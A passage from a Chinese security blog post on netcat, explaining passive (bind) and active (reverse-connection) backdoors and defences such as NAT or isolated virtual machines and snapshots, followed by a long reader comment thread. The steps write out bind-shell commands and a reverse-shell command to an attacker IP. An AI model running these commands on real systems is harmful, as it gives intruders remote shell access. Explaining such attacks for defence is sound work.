  为了让后门能工作,通常会使用 nc 的 -e 选项,该选项的“选项值”是一个可执行文件的路径。
  设置了该选项之后,当处于监听状态的 nc 接受到某个连接,会启动“选项值”对应的可执行文件(并得到某个进程),nc 会把该进程的“标准输入输出”与网络通讯【对接】。
  为了让这个后门用起来足够爽,攻击者通常会让 nc 去启动一个【shell 进程】。对 Windows 系统而言,就是 cmd.exe;对 POSIX 系统(Linux or UNIX)而言,就是 /bin/sh
  在这种情况下(nc 挂载 shell),攻击者远程连入 nc 的端口,就可以直接在这个 shell 上进行各种操作,其效果类似于 SSH 或(老式的)telnet。

◇入侵方法


  步骤1
  如果受害者是 Windows 系统,只须如下命令就可以开启一个后门(其中的 xxx 是端口号)
nc.exe -l -p xxx -e cmd.exe
  如果受害者是 POSIX 系统(Linux or UNIX),则用如下命令:
nc -l -p xxx -e /bin/sh

  步骤2
  后门创建好之后,攻击者在自己机器上也运行 nc(客户端 nc),然后连接到作为后门的 nc(服务端 nc)。一旦连上之后,攻击者就可以在自己的 nc 上看到对方(受害者机器)的 shell 提示符。

◇补充说明:-e 选项


  据说是考虑到 -e 选项太过危险,nc 的 OpenBSD 变种(在多年前)已经【移除】了该选项。但其实捏,还是可以用间接的方式达到同样的效果(具体如何做,俺就不透露啦)。
  另,“原版 nc”依然有这个选项;nc 的很多其它变种,也依然有这个选项。

◇【不够】靠谱的防范措施


  在这个场景中,大伙儿可能会想到三个值得改进之处:
1、浏览器的漏洞
2、使用公共 wifi 热点的习惯
3、防火墙的设置

  对第1点
  其实是【无解】滴!因为任何人都无法确保浏览器是【零漏洞】;

  对第2点
  要看每个人的具体情况而定。对有些人而言,“用公共热点上网”属于【刚需】。那就没办法了。

  对第3点
  “防火墙”这招,似乎是比较通用的解决之道。对大部分人而言,桌面 PC 根本就【不必】开启对外监听端口。因此,你可以配置操作系统自带防火墙,禁止【所有的】对外监听端口。
  但是!(俺要开始说【但是】了)
  操作系统自带的防火墙,本身也运行在操作系统【之内】。如果你是以【管理员身份】遭遇入侵,入侵者在进行【代码执行】的时候,就已经具有了【管理员权限】。在这个权限下,入侵者完全有可能“搞定”防火墙。方法有很多种——
比如说:把用作后门的端口号,悄悄加入到防火墙的白名单中;
再比如说:直接把防火墙的过滤模块干掉;
更牛逼的入侵者,甚至可以在【网卡驱动】上做文章——因为网卡驱动位于防火墙的过滤模块【之下】(比防火墙更底层)

◇【靠谱】的防范措施——NAT 模式的虚拟机(Guest OS)


  首先,这里所说的“NAT 模式”指的是【虚拟机的网卡模式】。如果你不熟悉虚拟机的网卡模式,建议先看俺写的《扫盲操作系统虚拟机》系列教程。

  要想用这招,步骤如下:
1、当然先要安装【虚拟化软件】(VBox、VMware ...),
2、安装一个虚拟的操作系统(洋文叫“Guest OS”)
3、虚拟系统的网卡设置为【NAT】模式

  完成上述步骤后,你就可以在这个虚拟系统中上网。
  NAT 的好处在于【单向可见】。也就是说,Guest OS 可以访问到物理系统(Host OS)【外部】的网络环境;但外部网络环境只能看到 Host OS,看不到 Guest OS。
  在这种配置下,就算某个入侵者完全控制了你的 Guest OS,他/她也【没】办法在 Guest OS 中搭建“被动连接型后门”。换句话说,即使入侵者运行了这种后门,(但由于 NAT 的缘故)后门【无法】接受外部网络的连接,这个后门就【失去意义】啦。

◇补充说明:“NAT 模式”如何搭配“系统防火墙”?


  上述“NAT 招数”与“系统防火墙”并【不】矛盾。
  也就是说,即使你用了这招,你的物理系统(Host OS)还是要配置系统防火墙,并禁止【所有的】对外监听端口。


★招数12:(入侵手法)用 nc 开启【主动】连接型后门


◇使用场景


  为了打字省力,继续用【前一个章节】的场景。差别在于,你采纳了前一章节的措施——在某个 NAT 模式的虚拟机(Gest OS)中上网,以对付【被动】连接型的 nc 后门。
  可惜的是——即便如此,入侵者在利用漏洞并获得“执行代码”的机会之后,还是有办法用 nc 在你的电脑上搞一个网络后门。
  虽然你用了 NAT 模式的【虚拟机】(Guest OS),但入侵者可以用 nc 创建一个【主动】连接型的网络后门(这种玩法,有时也称作“反向连接”的后门)。

◇原理


  原理其实与“招数11”很类似,唯一的差别在于——把客户端与服务端【对调】。也就是说,攻击者手头的 nc 充当服务端,而受害者机器上的 nc 充当客户端。此时,受害者本机的 nc【无须】开启监听端口,【不受】防火墙的影响,也【不受】NAT 的影响。

◇入侵方法


  步骤1
  既然 nc 的“服务端”与“客户端”对调。因此攻击者要先在自己机器上运行“服务端 nc”,命令如下(其中的 xxx 是端口号)。当然啦,攻击者自己电脑的防火墙需要允许 xxx 端口号对外监听。
nc -lk -p xxx

  步骤2
  如果受害者是 Windows 系统,只须如下命令就可以开启一个后门。
nc.exe -e cmd.exe x.x.x.x xxx
  如果受害者是 POSIX 系统,则用如下命令:
nc -e /bin/sh x.x.x.x xxx
  (在上述两个命令中, xxx 是步骤1用到的端口号,x.x.x.x 是攻击者的 IP 地址)

◇比“NAT 模式”更保险的是——【隔离模式】的虚拟机


  所谓的【隔离模式】,指的是“Host Only 模式”或类似的模式(比如:“Internal 模式”)。
  早在6年前(2013),俺就已经聊过【虚拟机隔离】的话题。具体参见如下系列教程的“第6篇、第7篇、第8篇”:
如何隐藏你的踪迹,避免跨省追捕
  虽然当年那个系列讲的是【隐匿性】,但其中的【虚拟机隔离】,同样可以用来对付“主动连接型后门”。

  有必要提醒一下:
  【隔离的虚拟机】可以增加入侵者的攻击难度。但【不能】做到 100% 防范。
  只要你能在某个隔离虚拟机中上网,那么——那些足够高级的木马,就【有可能】在隔离虚拟机中找到对外连接的通道。从而实现一个“【主动】连接型的后门”。
  这下该咋办捏?
  (在安全方面)虚拟机有两个【显著好处】——“网络隔离性”只是其中之一,另一个是【快照】。
  如果你对安全性的要求【非常高】,要学会:
1、用“快照功能”建立【安全基线】
(所谓的【安全基线】就是说——在确保系统【纯洁】的时候,先做一个快照)
2、养成【定期回退快照】的好习惯
(就算你中了木马,只要一回退到【安全基线】,系统重新变得【纯洁】啦)
  关于这方面的教程,俺专门写过一篇:
扫盲操作系统虚拟机[7]:如何用“快照”辅助安全加固、强化隐私保护?

◇“【主动】连接型后门”的优势之处(危险性之处)


  简单对比一下“后门的两种连接方式”。

  可用性
  如果用“被动型后门”入侵桌面 PC,考虑到绝大部分桌面 PC 都处于内网(其网卡【并未】分配公网 IP)。对这种场景,攻击者需要与受害者在同一个局域网,才能与后门建立通讯。
  相比之下,“主动型后门”就【没有】这种弊端。

  隐蔽性
  “被动型后门”需要显式开启监听端口,很容易引起用户的怀疑,或引起杀毒软件的注意。
  相比之下,“主动型后门”就【没有】这个问题。


★附录:netcat 的【其它变种】


  本文开头部分已经介绍了“原版 nc”以及“OpenBSD 变种”。在结尾部分,简单聊聊其它几个变种。

◇GNU netcat


  官网在“这里”。
  从名称可以猜出:这是 GNU 社区对“原版 nc”的重写,以符合 GPL 许可协议。
  按照它官网的说法,“GNU netcat”100% 兼容“原版 nc”的 1.10 版本。(注:1.10 版本是“原版 nc”用得最广的版本)

◇ncat


  这是 nmap 社区重写的 nc,其官网页面在“这里”,帮助页面在“这里”。
  它的口号是:Ncat - Netcat for the 21st Century
  与“OpenBSD 变种”类似,它也增加了代理的支持。相比“OpenBSD 变种”,它的主要亮点是:完全支持 SSL/TLS。
  由于它源自 nmap 社区,已经被包含在 nmap 软件包中(大多数 Linux & BSD 发行版的官方仓库都有 nmap)

◇socat


  在所有的变种里面,(据俺所知)这款可能是功能最强滴!但使用方法也有很大的不同(更复杂了)。感觉像是另一个全新的软件。
  很多主流的 Linux 发行版已经包含它。
  他也完全支持 SSL/TLS。

◇Cryptcat


  一看名称就能猜到:这是“加密的网猫”。
  由于大部分网猫都是直接在“裸 TCP”之上传输数据。如果传输的内容本身是明文,会遭遇【网络嗅探】的风险。
  这款变种在传输过程中用 twofish 算法加密,以规避嗅探。

◇sbd


  光看这3字母的名称,你可能不知道这款变种的特色。
  但如果俺告诉你:“sbd”是“Secure BackDoor”的缩写,你多半就猜到其特色了。
  它的加密采用“AES-128-CBC + HMAC-SHA1”。

◇netrw


  这是专门针对“文件传输”功能进行强化和简化的变种。
  【简化】方面
  它分成两个命令:netreadnetwrite,分别对应发送和接收。(相对“原版 nc”)省了几个命令选项。
  【强化】方面
  它会对传输过程进行散列校验,以防止传输的数据被篡改。


俺博客上,和本文相关的帖子(需翻墙)
扫盲 Linux&UNIX 命令行——从“电传打字机”聊到“shell 脚本编程”
为啥朝廷总抓不到俺——十年反党活动的安全经验汇总
如何隐藏你的踪迹,避免跨省追捕》(系列)
如何防止黑客入侵》(系列)
如何保护隐私》(系列)
关于 Tor 的常见问题解答
多台电脑如何【共享】翻墙通道——兼谈【端口转发】的几种方法
如何让【不支持】代理的网络软件,通过代理进行联网(不同平台的 N 种方法)
如何用 Privoxy 辅助翻墙?
扫盲操作系统虚拟机》(系列)
如何对付公安部门的“网络临侦”?——“黑暗幽灵(DCM)木马”之随想
使用 GitHub 的几种方式——兼谈安全性和隐匿性的经验
版权声明
本博客所有的原创文章,作者皆保留版权。转载必须包含本声明,保持本文完整,并以超链接形式注明作者编程随想和本文原始地址:
https://program-think.blogspot.com/2019/09/Netcat-Tricks.html

571 条评论

  1. 沙发
    顺便一问,博客目前有多少人气?

    回复删除
    回复
    1. 有13亿人气,其余就共产党那一小撮不是

      删除
  2. 想起来看看,就更新了一篇 :)
    这篇偏技术,对应一些特定的技术细节。
    俺慢慢研究吧 :)

    回复删除
  3. [quote]  还有些同学会问:为啥不用 FTP、SSH(或诸如此类的东东)?
      俺觉得:
    1、如果只是临时传一个文件,还要额外再去装某某软件的客户端/服务端,岂不是很蛋疼?
    2、任何服务端软件,(从某种意义上说)都是在【增加攻击面】。[/quote]
    如果只是linux系的系统上互相传文件,卸载ssh是很蛋疼滴

    回复删除
    回复
    1. 这种情况通常会使用 rsync,netcat 的攻击面未必比 rsync 更低。

      删除
  4. 要获取网页,wget --recursive会不会更好?

    回复删除
    回复
    1. 不应该说“更好”,应该说可以达到无痕的目的,而且可以获得网页相关资源;但是当然需要多安装一个客户端软件wget。

      删除
    2. 我个人非常喜欢使用wget。我用来抓取博主论坛留言条目XML格式导出并且备份的工具就是wget。

      删除
    3. 环球屎报主便胡公公最近抱怨沦陷日临近翻墙难。我感到非常困惑:难道像胡公公这样的翻墙达人推特老手(接近川普水准了)手头还没有一两套过硬的翻墙工具?Shadowsocks说什么也得装备一二吧?!另外胡公公他经常去香港,连去香港买一片SIM带回墙内漫游这个方法都不懂?

      删除
  5. 博主说[quote]但可惜的是:SSH【不支持】SOCKS 代理,[/quote]
    遗憾的是,windows平台的putty提供的ssh客户端支持走socks代理。博主的意思是不是说,linux下的ssh客户端本身不支持socks代理,要借助于其他东西才行

    回复删除
    回复
    1. [quote]windows平台的putty提供的ssh客户端支持走socks代理[/quote]

      那个是利用ssh端口转发实现的,GNU/Linux一样可以通过ssh端口转发实现

      删除
  6. 博主终于发技术文章了,这次我的提问有点多,希望博主耐心回复。

    回复删除
    回复
    1. 博主怎么看天朝的开源项目?是否靠谱?会不会有后门?尤其是 BAT 等大公司的开源项目,会不会留下隐藏很深的高级后门,需要安全审计人员花费大量时间才能发现?使用了这些开源组件库的软件能否放心使用?

      删除
    2. 博主有没有用过天朝公司开发的 SDK?怎样防止它们作恶或者留下后门?尤其是移动端 app 开发,很多 SDK 都会申请不必要的权限,如电话,短信,定位等,怎么解决这个问题?

      删除
    3. 博主是否听说过,有的天朝公司会伪装成国外公司?怎么看待这个现象?这些软件是否靠谱?他们的官网是英文的,但如果仔细观察,比如软件的数字证书等地方,就会发现开发者其实是中国人。据我所知包括 Windows 的清理软件 ASC,隐私保护软件 Shadow Defender 等,都是天朝人开发的。欢迎大伙儿补充其他例子。

      删除
    4. 博主认为理想的 IM 应该具有哪些功能?
      (讨论这个话题,是因为我最近发现天朝有个开源的[url=https://github.com/wildfirechat]野火 IM[/url],我担心它会有后门)
      我个人认为,理想的 IM 应该具有以下功能:

      1. 匿名性
      无需注册,不收集用户的个人信息,如手机号,邮箱等,他人无法追踪。
      2. 安全性
      使用最新的密码学安全的加密算法和相关技术,包括 NaCl / Sodium 加密库及其推荐的加密算法,E2EE 端到端加密,OTR 等,最大限度保证信息安全。
      3. 高可用性
      分布式去中心化,没有中心服务器,客户端可以作为节点帮助其他客户端连接目标节点,GFW 和其他审查部门很难或无法封锁。
      4. 完整性
      消息默认保存在本地,可选保存在去中心化节点中,使用区块链技术,新设备自动同步云端消息,支持阅后即焚。
      5. 易用性
      客户端界面友好,简单易用,支持文字,图片,表情,语音,视频,文件以及音视频通话这些 IM 基本功能,在此基础上,可以有一些社交功能。
      6.可移植性
      开源且跨平台,支持 Windows,Linux,macOS,iOS,Android 等主流操作系统,客户端使用 Native 而不是 Electron, React Native 这些基于 Web 的技术来开发,同时也有 Web 网页版。
      7. 健壮性
      这一点针对移动设备,无需网络也能使用,在没有 WiFi 和流量的特殊情况下,仍然可以使用蓝牙或者其他方式进行近距离通信。

      在目前我所知道的 IM 里面,最接近理想 IM 的应该是 Tox,其次是 BitMessage,但它们的易用性不够,而且我用 Tox 没有收到其他人的好友请求。

      删除
    5. 博主认为【最好的】编程语言是什么?
      (这个话题主观性极强而且非常容易引发口水战,但我还是希望博主分享一下观点)
      主要是因为我看了一篇文章[url=https://segmentfault.com/a/1190000000400854]世界上最好的编程语言[/url],很认同作者的观点,尤其是可以“使用自己本身写扩展”这一点。
      我也同意博主在动态格言里面贴的:
      [b]世界上只有两种编程语言——要么充满了抱怨;要么没人使用 [/b]
      吐槽一下:
      我喜欢的编程语言恰恰是【没人使用】的,我个人觉得,之前很火的那个 Web 框架,现在已经成为了最大的“绊脚石”。甚至我用的 Arch Linux 中,Arch wiki 介绍的这些 AUR Helper 没有一个是用这门语言开发的(没人用它来写,我曾经打算写一个,写了一半放弃了,不是写不出来,而是我觉得维护成本高,可能是我没有相关经验)。

      删除
    6. 如果要准备一台【无需联网】的电脑,用来进行诸如“存放加密货币冷钱包”之类的敏感操作,用什么 OS 最好?按照博主的原则,应该选择【保守型】【社区维护】【口碑好】的 Linux 发行版,我马上想到了 Debian。由于不联网,肯定不能用像 Arch Linux 这种激进的发行版,因为如果一段时间不更新,再更新时很容易出问题(比如无法启动,俗称“滚挂了”)。或者应该选择一个专门进行安全强化的发行版?(我顺便去那篇选择 Linux 发行版的文章评论了)

      删除
    7. 博主有没有找到一个合适的 Blogspot 和 BTSync 替代品?
      看了之前评论区的相关讨论,我觉得目前暂时只有 IPFS 这样的【去中心化】【区块链】技术是可行的。我虽然早已知道 IPFS 可以搭建静态网站,但我并没有实际操作过,不知博主怎么看?
      记得之前评论区有个老熟人就叫 IPFS,搭建过本博客的镜像,不知用 HTTP 协议(可以认为是明网)访问是否需要运行 IPFS 节点的中心服务器,以及能否 / 有无必要同时使用多个 Gateway?
      BTSync 可以用 Sia 或者 Storj 来替代,这两个都是基于【区块链】技术的云存储方案。

      删除
    8. 关于国外注重隐私的网站和服务替代品,除了之前博主推荐过的[url=https://prism-break.org]粉碎棱镜[/url],我还发现一个类似的:[url=https://cybermagicsec.github.io/privacytools-zh/]隐私工具——加密安全对抗全球大规模监控[/url]
      由于 IM 的广泛使用,很多人不喜欢 / 不习惯用邮件交流(尤其在天朝,国外通常使用 IRC 和邮件列表),往往只有注册用户才打开邮箱(短信也一样)。不过在某些情况下还是要用到邮箱的。
      除了不少人都知道的 ProtonMail 之外,还有另一个冰岛的邮箱:CTemplar,相关介绍在[url=https://www.httpsmail.com/CTemplar-most-secure-email.html]这里[/url](下面还介绍了 Criptext,感兴趣的可以看看)。此外之前评论区还有人推荐 SIGAINT 这个暗网的安全邮箱,不过据说免费版限制较多,他们的管理人员是匿名的。
      强烈建议博主专门写一篇文章介绍相关的隐私替代品,最好附上点评,放到《如何保护隐私》系列文章中。那个系列里面虽然有文章介绍替代品,但可能无法对抗棱镜门以及十四眼联盟的国际监控(当年斯诺登泄露的机密情报有提到)。我认为应该首选冰岛和瑞士的服务,尤其是冰岛,是阿桑奇和斯诺登首选的政治避难申请国。

      删除
    9. 说到安全相关话题,顺便问一下,之前有人说他用 UUID 作为密码,请问博主这样的密码是否安全?会不会被【彩虹表】暴力穷举出来?
      关于密码管理软件,原则上最好使用 keepass 生成的随机密码,商业的密码管理器不靠谱,不过随机密码往往需要复制粘贴,不太方便而且可能会泄露(在使用剪贴板历史管理工具的情况下)。

      删除
    10. 还有一个问题:怎样设置一个随机的【地理位置坐标】,避免被网页使用相关 Web API 获取到真实位置信息?需要包括桌面和手机平台,博主似乎没有在相关文章中提到过?

      删除
    11. 吐槽一下:博主这个发文时间果然不错,我之前猜测博主前天会发文,结果并没有(应该跟上一篇文章的时间有关),这次我看其他文章,无意刷新一下竟然错过了沙发,加上免费梯子速度极慢,有时甚至打不开网页,我临时找了个快一些的梯子才上来的。

      删除
    12. [quote]博主怎么看天朝的开源项目?是否靠谱?会不会有后门?尤其是 BAT 等大公司的开源项目,会不会留下隐藏很深的高级后门,需要安全审计人员花费大量时间才能发现?使用了这些开源组件库的软件能否放心使用?[/quote]

      这些项目是否有后门:参考ESR的那句话(Linus定律), 尤其是那些开源项目有了不小影响的情况下。
      BAT等会不会留后门(包括不是很容易察觉的)?按照它们有没有能力留去考虑
      使用了这些开源组件库的软件能否放心使用?没必要过于纠结这个,有忧虑可以考虑替代



      [quote]博主是否听说过,有的天朝公司会伪装成国外公司?怎么看待这个现象?这些软件是否靠谱?他们的官网是英文的,但如果仔细观察,比如软件的数字证书等地方,就会发现开发者其实是中国人。据我所知包括 Windows 的清理软件 ASC,隐私保护软件 Shadow Defender 等,都是天朝人开发的。欢迎大伙儿补充其他例子。[/quote]

      Foxit, (AOMEI) Partition Assistant, PartitionGuru ... 如果范围扩大到被天朝公司收购的海外开发者开发的东西的话的话那就更多:)



      [quote]博主认为【最好的】编程语言是什么?[/quote]

      这种问题出口水战的原因就是什么是“最好”

      删除
    13. 顺便问问大伙儿,有没有支持 BTC 或者其他加密货币支付的机场?现在的机场基本上都是“支付宝”和“微信支付”,非常不靠谱。

      删除
    14. TO V2EX 7楼10单元
      浏览器可以直接拒绝位置权限。
      安卓有很多,play商店搜fake location 就有很多,有些甚至可以设置成在某范围内随机移动。
      现在的苹果不知道,但是多年前某同行玩Pokémon GO的经验,那个时候的苹果手机必须越狱才能设置随机坐标,然而越狱是不安全的。

      删除
    15. TO Zeroth Posclegomer(12 单元)
      零兄这次又抢了沙发?
      我知道你提到的这些是天朝的软件,因为它们的官网是中文的,甚至英文版的本地化都不完整。

      删除
    16. V2EX 7楼9单元
      这取决于UUID 如何生成,有些方法并不存在hash,比方说使用【真随机数】,如此一来也就不存在hash攻击了。

      剪切板确实是你需要关照的地方。使用时考虑关掉其他带有历史记录的软件。

      补充一个小技巧:如果网页允许你先输密码,那就先复制密码,再复制用户名,这样可以节约一点时间,毕竟用户名泄露往往没事。否则可能要手动清空密码,或者等密码器多少秒后自动清空剪切板。

      删除
    17. TO V2EX 7楼7单元
      IPFS这种静态资源发布工具,假设你是某杂志的编辑好了,请问你要如何发布下一期杂志的URL?这个难不难做到?

      删除
    18. TO Zeroth Posclegomer(14 单元)
      我说的是 HTML5 的 [url=https://developer.mozilla.org/en-US/docs/Web/API/Geolocation_API]Web Geolocaltion API[/url],不是【Fake GPS】,电脑没有 GPS 定位功能,但仍然可以通过这个 API 大致定位。(电脑网页地图定位就是用的这个 API)

      删除
    19. TO Zeroth Posclegomer(17 单元)
      这个简单,很多博客程序(动态和静态)都可以自定义文章的 URL,或者可以在下次发布前更新文章。

      删除
    20. TO V2EX 7楼5单元
      谈一下我的观点,我认为编程语言没有对错之分,只有【喜好】之分,顶多聊一聊在某些特定环境下体现出来的优缺点。
      流行的当然不一定是最好的,你在选择一门语言的时候也是在选择一个社区。
      文章说PHP的流行是因为虚拟空间很便宜,这句话我并不完全认同,也许国内的人喜欢买便宜空间。不过据我所知,国外的PHP的社区有个求简、易用的风格,尤其是官网文档的通俗易懂程度是对新手非常友好的。而且在对于要不要给php增加新功能时,社区也常常发动投票。我本人对于国内的php框架及社区是比较厌恶的态度。
      php也有不少缺点,
      其一,是针对性太强,几乎做php的人大部分都是在做web,而干其他事就不太适合php了,不是完全干不了。
      其二,本身不支持多线程。不是完全做不了,只是要绕一大圈

      删除
    21. 博主是不可能使用IM软件的,至少编程随想这个身份不可能使用的。因为IM软件会暴露在线时间的信息,以前提到过的。现在博主连邮件跟读者交流都少了

      删除
    22. 这么流氓的性格,我宁可直接用android studio也不会使用这种国产SDK
      这种一眼就能看出缺乏安全审查的,为啥还需要选它?从安全的角度看,在不必要的情况下额外开权限,都是【增加攻击面】的行为,是不值得鼓励的。

      在审查不足,迭代周期较短的情况下,要看开发者或者维护这个sdk的公司是否愿意承担责任,即便是开源的。有时候这个责任甚至具有赌博性质,1赔10还是7赔1

      国产开源项目我只推荐shadowsocks,对于其余开源项目,还是尽量选择【国际性】项目的好,我暂时想到只有一种例外,就是NLP技术,这种专门处理语言文字的项目,还是本国人来比较好。

      删除
    23. TO V2EX (7楼19单元)
      [quote]TO Zeroth Posclegomer(17 单元)[/quote]
      愚弟讨论的水平显然不及零兄嘛,发评论时间上恰好接近了一点,V兄标来标去滴,让愚弟怎么好意思

      删除
    24. 有个问题要请教零兄,乍得是否有半数穆斯林?是否给国家造成麻烦?
      维基百科说
      [quote]宪法列明乍得是个世俗国家,并保障宗教自由,不同的宗教信仰在乍得大致相安无事。[/quote]
      这句话的分量是否可靠?

      删除
    25. TO 24单元
      乍得可能有半数穆斯林,这点我不得而知。
      但是可以肯定的是乍得非常贫穷,贫穷应该是乍得的首要问题和社会矛盾所在。

      删除
    26. TO V2EX 15单元
      12单元不是我,但是方式和我一样,这样很好,有助于帮助混淆我在此论坛里的出现。使我感到非常安全。
      我对于墙内的软件除了知名的比如微信微博以外,不太了解。

      删除
    27. TO V2EX 18单元
      学习了,14单元不是我,但是也学习了,这可能就是为什么谷歌地图笔记本电脑版就算隔了一个VPN都能知道我在什么地方的缘故。

      删除
    28. TO V2EX 19单元
      学习了,尽管17单元不是我。

      删除
    29. TO 23单元 高仿者
      哇塞,你的高仿水平真好。的确以前我以前的风格就是这样的。
      另外你还可以高仿我以前发的那些黄段子,相信应该可以带动论坛气氛的。

      删除
    30. TO 博主
      胡锡进抱怨最近翻墙困难,我实在感到费解:难道他连去香港买一片SIM带回墙内漫游都不懂吗?

      删除
    31. TO Zeroth Posclegomer(25 单元)
      (之前没留意文字风格,所以不小心认错了)
      其实我可以从一个细节判断你在加拿大。
      ==========
      加拿大法语跟法国法语不同,法国人往往听不懂加拿大法语,比如类似老北京的“儿化音”。另外加拿大法语更倾向于用 Tu(你)而不是 Vous(您)称呼陌生人。

      删除
    32. [b]这是补充 8 单元的一个提问,希望博主能回复。[/b]

      有没有比【邮箱】更好的网站账号方【找回密码】的验证方式?
      目前天朝为了配合【网络实名制】会使用【短信】验证,缺点很明显:短信没有邮箱安全,短信服务费用高,而且毫无隐私可言。
      有人提出使用【加密货币助记词】作为找回密码的验证方式,我也想到了 GPG 私钥验证,不知博主觉得怎样?

      删除
    33. TO 14 单元的网友
      我忘了 JavaScript 申请某些敏感权限必须得到用户允许。
      你说到 Fake GPS 以及“小畜生”游戏“开飞机”,我没有玩过“小畜生”,但我之前是 ingress 玩家(“猩猩”的另一个游戏),后来由于隐私考虑就没玩了,因为这个游戏暴露实时位置,其他玩家可以跟踪。我曾经开过飞机,但很快就放弃了,这对于正常玩家来说是很不公平的,也违背了游戏的初衷,失去了游戏的乐趣。

      删除
    34. TO 16 单元的网友
      UUID 跟 Hash 算法不太一样,不过似乎用到了 MD5?(我不清楚算法的具体细节,之前看过一个 PHP 的实现,用到了 MD5)
      我指的是,假设黑客 A 知道目标 B 使用 UUID 作为密码,那么 A 是否可以构造一个 UUID 字典,穷举 B 的密码?(其实这不是“彩虹表”,不过发出去的评论已经无法修改了)

      删除
    35. TO 20 单元的网友
      PHP 被设计为一种 Web 编程语言,它很难作为通用脚本语言使用(虽然有 Win32 API 扩展)。
      相比之下,我喜欢的这个编程语言属于通用脚本语言,但可惜的是,许多人只知道它的一个 Web 框架,于是它被当成了类似 PHP 的语言使用,可以说是大材小用了。
      相比 Python 有各种库可以使用,这个编程语言相同类型的的库往往选择不多,有的库只有一个选择(甚至干脆没有库)。让人担忧的是,有些库多年不更新了,也许几年之后就真的没人用这个语言了。

      删除
    36. TO 22 单元的网友
      天朝的开源软件分为【个人】和【公司】开发的。
      对于个人开发者,他们一般没有利益驱动,因此作恶的可能性不大,而对于公司来说, KPI 等指标会驱使他们去作恶。
      你提到的 Shadowsocks 当然是个很好的开源项目,我觉得 V2Ray 更好,开发者不满 SS 作者被请喝茶,于是开发了这个更好的翻墙工具,GFW 更难封锁。

      删除
    37. [b]前面聊了这么多,讨论一下本文相关话题。[/b]

      我感觉 netcat 的知名度不如同一个开发者的 nmap 高。
      我知道 nc 这个命令,是因为我之前在电脑上进行 Android 数据恢复时发现的,如果你在电脑上用这些软件,你会发现它们都自带了 nc。
      具体恢复方法参考:[url=https://daily.zhihu.com/story/7813372]如何对安卓手机进行数据恢复?[/url]
      这个方法略微复杂,其实还有一个更简单的方法:
      为了避免干扰,手机重启到第三方 Recovery(如 TWRP),连接电脑并在电脑运行:
      [quote]adb pull /dev/block/by-name/userdata data.img[/quote]
      然后使用 R-Studio 等支持选择磁盘文件的数据恢复软件进行恢复。

      删除
    38. 补充一个高级玩法:用 HAProxy 反代隐藏 SSH 以及梯子
      在服务器运行:
      [quote]nc -l -p port | hexdump -C[/quote]
      (port 是一个未被占用的端口)
      然后在客户端连接这个 port,就可以在服务器上观察到对应协议的特征。(比如:用 SSH 连接 port 就可以看到 SSH 的特征)
      而利用 HAProxy 判断特征前几位,就可以让它转发给服务器的对应服务(可以是 sshd,梯子,Web Server 等),而该服务只需要监听本机,然后用防火墙禁止其他端口,可以大幅提高安全性。你甚至可以在 443 端口使用多种代理工具!
      HAProxy 相关配置参考:https://github.com/izhaohui/haproxy_443
      (经测试,V2Ray 使用 WebSocket + TLS + Web 模式的配置文件会稍微麻烦一些)

      删除
    39. [b]强烈建议博主尽快使用之前计划的 GPG 验证方式解决匿名带昵称用户【冒名顶替】的问题!!![/b]

      删除
    40. 博主之前提到的用 GPG 验证匿名用户身份防止冒名顶替的方法,理论上是完全可行的,关于【性能】问题,我估计主动使用这个功能的人不多,如果只是有几十条需要验证签名的信息,性能应该不是问题。建议博主先进行【公开测试】看看效果怎么样。

      删除
    41. 聊一下虚拟机的【网卡模式】
      之前的 VirtualBox e1000 网卡的【虚拟机穿透】 [url=https://github.com/MorteNoir1/virtualbox_e1000_0day]0day 漏洞[/url]不用我说了吧,大伙儿应该都知道了,博主似乎没在博文提到过?所以 NAT 模式【不够安全】。
      之前博主提到,VirtualBox 支持 internal 模式,其实 VMware Fusion(macOS)也支持,但 VMware Workstation(Windows & Linux)貌似不支持。

      删除
    42. 另外,我认为博主非常有必要写一篇系统自带【防火墙】的“扫盲”教程。
      包括:Linux 的 iptables / nftables / firewalld,FreeBSD 的 ipfw,ipfitler,OpenBSD / macOS 的 pf 等。
      【不】包括:Windows 自带防火墙(图形界面很容易设置)。

      删除
    43. TO V2EX 31单元
      喔喔,太厉害了! 居然能分辨加拿大法语和法国法语的不同!你确定你是法语初学者?!
      是的,我住在Montreal中国城Quartier Chinois。

      删除
    44. TO V2EX 36单元
      的确V2Ray应该更胜Shadowsocks。而且V2Ray作者在墙外,不可能被请喝茶。
      真的不知道Clowwindy当初是怎么想的,搞了Shadowsocks以后还不知道要肉身翻墙。

      删除
    45. 我在 32 单元提到的 GPG 私钥验证方式,一开始想到的是:服务器生成私钥和公钥,让用户下载并妥善保管私钥,找回密码时上传私钥,但这样做很明显不安全。刚刚想到了更好的验证方式:
      1. 用户自行生成 GPG 公私钥,在用户设置中添加公钥(类似 GitHub);
      2. 找回密码时,服务器给出一段文字,要求用户用自己的私钥签名,上传签名后的文件;
      3. 服务器验证签名是否有效。
      (或者反过来:服务器用公钥加密信息让用户下载文件,由用户解密并提交,服务器验证信息是否正确,但这样会增加难度)
      不知有没有更好的方式?因为这对于不懂技术的人来说太难了,还不如用 YubiKey 之类的硬件来验证。

      删除
    46. TO Zeroth Posclegomer(43 单元)
      我只是无意间在[url=https://zhuanlan.zhihu.com/p/48916014]知乎[/url]看到的,我还没去过加拿大。

      删除
    47. TO Zeroth Posclegomer(44 单元)
      据说是因为 Clowwindy 比较张扬,而且他 / 她(有人说是妹子)在知乎工作。
      目前 Shadowsocks 的另一个主要开发者 [url=https://github.com/madeye]madeye[/url] 在 NVIDIA 上海公司工作,此人很低调,没人找他麻烦。

      删除
    48. (接上一单元)
      相比之下,SSR 的开发者 breakwa11 也很张扬,粉丝众多(不确定此人是不是妹子),最终因为某事被人肉,因此停止了开发(不是被请喝茶)。

      删除
    49. TO V2EX 46单元
      以后来加拿大欢迎到Montreal参观。

      删除
    50. TO V2EX 47单元
      跑去了GayHub看了一下,madeye好像主要是负责shadowsocks安卓客户端开发,其优先级别比clowwindy要低很多,也许这也是一个因素为什么没人找他找她麻烦。

      删除
    51. TO V2EX 48单元

      breakwa11感觉是妹子的可能性更加大一些。

      删除
    52. TO Zeroth Posclegomer(49 单元)
      如果我去加拿大,一定是去 Quebec,到时没准我们能见面 :)

      删除
    53. TO Zeroth Posclegomer(50 单元)
      madeye 主要负责开发 shadowsocks-libev,这个是用 C 写的,Clowwindy 当年写的主要是 Python 版,也有其他语言。

      删除
    54. [b]博主认为 TOR 应该设置哪些出口节点,排除哪些出口节点?[/b]
      (为了让博主注意到,特地用粗体标示)
      这个问题之前评论区有好几个读者问过了,博主似乎没有注意到,我现在也开始关心这个问题了。
